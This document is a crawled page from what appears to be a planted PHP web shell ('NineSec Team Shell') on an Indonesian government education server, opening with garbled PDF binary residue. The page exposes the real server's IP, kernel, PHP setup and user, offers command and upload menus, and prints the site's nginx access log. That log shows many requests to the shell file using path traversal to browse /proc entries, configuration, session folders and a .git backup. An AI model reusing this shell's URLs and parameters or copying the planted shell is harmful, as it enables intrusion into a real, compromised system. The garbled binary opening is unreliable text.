%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 118.98.227.230  /  Your IP : 216.73.216.213
Web Server : nginx/1.18.0
System : Linux p3gtk 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /var/log/nginx/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //var/log/nginx/access.log
216.73.216.213 - - [05/Nov/2025:00:00:11 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Ftask HTTP/1.1" 200 4556 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:00:36 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fuid_map&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 4162 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
95.190.73.128 - - [05/Nov/2025:00:00:38 +0700] "GET http://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=4.9.8 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
216.73.216.213 - - [05/Nov/2025:00:00:41 +0700] "GET /storage/uploads/file-renstra/1761960249.php?komend=gaskan&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 6717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.9 - - [05/Nov/2025:00:00:41 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../objects/bd/../df HTTP/1.1" 200 5393 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.213 - - [05/Nov/2025:00:00:46 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Farch_status&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 4150 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:00:51 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fpagemap&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 404 47 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:01:34 +0700] "GET /storage/uploads/file-renstra/1761960249.php?memek=gaskan&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.9 - - [05/Nov/2025:00:01:39 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/c2/../db HTTP/1.1" 200 5247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.213 - - [05/Nov/2025:00:01:39 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fpersonality&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 4152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:01:44 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fmountinfo&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 5486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:01:49 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fgid_map&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 4169 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.121 - - [05/Nov/2025:00:01:50 +0700] "GET /berita/detail/mendikbudristek-tegaskan-vaksinasi-siswa-bukan-prakondisi-lakukan-ptm-di-wilayah-ppkm-level-1-3 HTTP/1.1" 200 30411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.213 - - [05/Nov/2025:00:01:54 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fautogroup&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.121 - - [05/Nov/2025:00:02:08 +0700] "GET /assets-front/css/custom.css?v=25 HTTP/1.1" 200 32147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.13 - - [05/Nov/2025:00:02:14 +0700] "GET /assets-front/css/bootstrap.css?v=23 HTTP/1.1" 200 198473 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.13 - - [05/Nov/2025:00:02:15 +0700] "GET /assets/libs/sweetalert2/sweetalert2.min.js?q=UVDKX HTTP/1.1" 200 44933 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.213 - - [05/Nov/2025:00:02:22 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fconfig%2F..&upload=gaskan HTTP/1.1" 200 6392 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:02:27 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fconfig%2F..%2Fapp HTTP/1.1" 200 5169 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.9 - - [05/Nov/2025:00:02:30 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../objects/bd/../bf HTTP/1.1" 200 5701 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.213 - - [05/Nov/2025:00:02:32 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fvendor%2Fmockery&upload=gaskan HTTP/1.1" 200 4991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:02:37 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fapp&upload=gaskan HTTP/1.1" 200 5205 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
4.196.198.88 - - [05/Nov/2025:00:02:38 +0700] "GET /regulasis/detail/peraturan-menteri-pendidikan-kebudayaan-riset-dan-teknologi-republik-indonesia-nomor-40-tahun-2021-tentang-penugasan-guru-sebagai-kepala-sekolah HTTP/1.1" 200 28608 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
216.73.216.213 - - [05/Nov/2025:00:02:42 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fconfig%2F..%2FREADME.md&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fconfig%2F.. HTTP/1.1" 200 5901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:02:48 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fstatus&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
46.33.235.79 - - [05/Nov/2025:00:02:49 +0700] "GET http://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=4.9.8 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
216.73.216.213 - - [05/Nov/2025:00:02:52 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fstatm&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 4168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:02:57 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fcpuset&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 4150 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:03:02 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2F%2Fproc%2Fsysvipc%2F..%2F2694634%2Fmounts&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 31 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:03:07 +0700] "GET /storage/uploads/file-renstra/1761960249.php?logout=gaskan&path=%2F%2Fproc%2Fsysvipc%2F..%2F2694634 HTTP/1.1" 200 4093 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.9 - - [05/Nov/2025:00:03:17 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../objects/bd/../ba HTTP/1.1" 200 31 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.213 - - [05/Nov/2025:00:03:24 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fconfig%2F..%2Fcomposer.json&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fconfig%2F.. HTTP/1.1" 200 5061 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:03:28 +0700] "GET /storage/uploads/file-renstra/1761960249.php?komend=gaskan&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fvendor%2Fmyclabs HTTP/1.1" 200 4749 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:03:33 +0700] "GET /storage/uploads/file-renstra/1761960249.php?logout=gaskan&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fvendor%2Fbrick HTTP/1.1" 200 4168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:03:38 +0700] "GET /storage/uploads/file-renstra/1761960249.php?komend=gaskan&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fapp HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:03:43 +0700] "GET /storage/uploads/file-renstra/1761960249.php?komend=gaskan&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fvendor%2Ftheseer HTTP/1.1" 200 4750 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.9 - - [05/Nov/2025:00:03:56 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../objects/bd/../cb HTTP/1.1" 200 5637 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
5.180.253.39 - - [05/Nov/2025:00:04:06 +0700] "GET http://azenv.net/ HTTP/1.1" 301 178 "-" "Go-http-client/1.1"
5.180.253.39 - - [05/Nov/2025:00:04:07 +0700] "CONNECT kspstendik.dikdasmen.go.id:443 HTTP/1.1" 400 166 "-" "-"
216.73.216.213 - - [05/Nov/2025:00:04:09 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2F..%2Fpackage.json&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2F.. HTTP/1.1" 200 4611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:04:13 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2F..%2F.styleci.yml&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2F.. HTTP/1.1" 200 4295 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
80.70.111.155 - - [05/Nov/2025:00:04:18 +0700] "GET http://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=4.9.8 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
216.73.216.213 - - [05/Nov/2025:00:04:18 +0700] "GET /storage/uploads/file-renstra/1761960249.php?logout=gaskan&path=%2F%2Fsys%2Fmodule%2Fkdb%2F..%2Fpage_alloc HTTP/1.1" 200 4104 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:04:23 +0700] "GET /storage/uploads/file-renstra/1761960249.php?logout=gaskan&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fvendor%2Fmyclabs HTTP/1.1" 200 4170 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:04:28 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fconfig%2F..%2F.gitignore&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fconfig%2F.. HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:04:35 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework%2F.. HTTP/1.1" 200 4730 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.9 - - [05/Nov/2025:00:04:36 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../objects/bd/../bc HTTP/1.1" 200 5389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.213 - - [05/Nov/2025:00:04:39 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework%2Fsessions HTTP/1.1" 200 19833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.9 - - [05/Nov/2025:00:05:08 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/7d/../df HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.213 - - [05/Nov/2025:00:05:21 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework&upload=gaskan HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:05:25 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework%2Fviews HTTP/1.1" 200 16785 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.9 - - [05/Nov/2025:00:05:35 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/ef/../d8 HTTP/1.1" 200 5793 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.194.1.3 - - [05/Nov/2025:00:06:04 +0700] "GET /berita/detail/kemendikbudristek-optimalkan-peran-orang-tua-dalam-pencegahan-perundungan-dan-kekerasan-seksual HTTP/1.1" 200 806836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
216.73.216.213 - - [05/Nov/2025:00:06:07 +0700] "GET /storage/uploads/file-renstra/1761960249.php?komend=gaskan&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework HTTP/1.1" 200 5095 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.213 - - [05/Nov/2025:00:06:11 +0700] "GET /storage/uploads/file-renstra/1761960249.php?fileloc=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework%2F.gitignore&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework HTTP/1.1" 200 4273 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
103.167.170.113 - - [05/Nov/2025:00:06:12 +0700] "GET /panduan/detail/11 HTTP/1.1" 200 28493 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:12 +0700] "GET /assets-front/css/bootstrap.css?v=9 HTTP/1.1" 200 198473 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:12 +0700] "GET /assets-front/css/dark.css HTTP/1.1" 200 47913 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:12 +0700] "GET /assets-front/css/select2/select2.min.css HTTP/1.1" 200 16263 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:12 +0700] "GET /assets-front/css/swiper.css HTTP/1.1" 200 13682 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:12 +0700] "GET /assets-front/css/font-icons.css HTTP/1.1" 200 123168 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:13 +0700] "GET /assets-front/css/style.css?v=9 HTTP/1.1" 200 328602 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:13 +0700] "GET /assets-front/css/magnific-popup.css HTTP/1.1" 200 7332 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:13 +0700] "GET /assets-front/css/bootstrap-icons.css HTTP/1.1" 200 80532 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:14 +0700] "GET /assets-front/css/custom.css?v=100 HTTP/1.1" 200 32147 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:14 +0700] "GET /assets-front/css/swiper/swiper-bundle.min.css HTTP/1.1" 200 18433 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:14 +0700] "GET /assets/libs/sweetalert2/sweetalert2.min.css HTTP/1.1" 200 24444 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
